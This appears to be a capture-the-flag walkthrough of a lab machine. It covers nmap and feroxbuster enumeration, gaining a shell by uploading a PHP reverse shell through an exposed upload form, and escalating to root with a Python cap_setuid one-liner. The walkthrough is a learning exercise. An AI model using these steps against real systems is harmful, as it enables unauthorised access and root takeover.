RATING
Easy
ENUMERATION
First, we kick it off with our usual nmap scan for these types of boxes:
Command: nmap -sV -sC -T4 -Pn -p- 192.168.163.83
Navigating over to the target in our browser, we don’t see anything of interest.
Directory bruteforcing with feroxbuster on port 80 doesn’t give us anything of much interest. We proceed to directory bruteforce port 8088 and specifically filtering for .html extension.
This produces a url http://192.168.163.83:8088/upload.html:
Command: feroxbuster -u http://192.168.163.83:8088/ -w /usr/share/wordlists/dirb/common.txt -k --quiet -s 200 -x .html
EXPLOITATION
Navigating to this is our browser, we see an upload form and proceed to upload our php reverse shell (don’t forget to change IP and port).
Take note of the following message, which tells us where the shell has been moved to:
Starting our netcat listener and navigating over to http://192.168.163.83:8715/katana_php_shell.php, gets us a shell as www-data:
PRIVILEGE ESCALATION
We check for binaries with the SUID bit enabled. We don’t find anything interesting here:
Command: find / -perm -u=s -type f 2>/dev/null
We then check for binaries with capabilities and see that /usr/bin/python2.7 had cap_setuid capabilities. We can take advantage of this using GTFOBins:
Command: getcap -r / 2>/dev/null
Command: /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'
With this, we are escalated to root and can read our flag.